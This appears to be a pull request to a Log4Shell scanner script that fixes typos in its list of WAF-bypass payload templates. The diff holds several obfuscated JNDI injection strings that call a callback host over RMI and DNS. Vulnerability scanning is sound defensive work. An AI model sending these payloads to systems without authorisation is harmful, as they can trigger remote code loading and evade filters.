### PR TITLE
log4j-scan.py: fix typoes in waf payload templates

### DIFF
--- a/log4j-scan.py
+++ b/log4j-scan.py
@@ -52,8 +52,8 @@ timeout = 4
 waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
                        "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
                        "${jndi:rmi://{{callback_host}}}",
-                       "${${lower:jndi}:${lower:rmi}://{{callback_Host}}/{{random}}}",
-                       "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host/{{random}}}",
+                       "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
+                       "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
                        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
                        "${jndi:dns://{{callback_host}}}"]


### PR DESCRIPTION
Note, this also includes the fix from
https://github.com/fullhunt/log4j-scan/pull/35
because otherwise the diffs would overlap and conflict.

Signed-off-by: Hank Leininger <hlein@korelogic.com>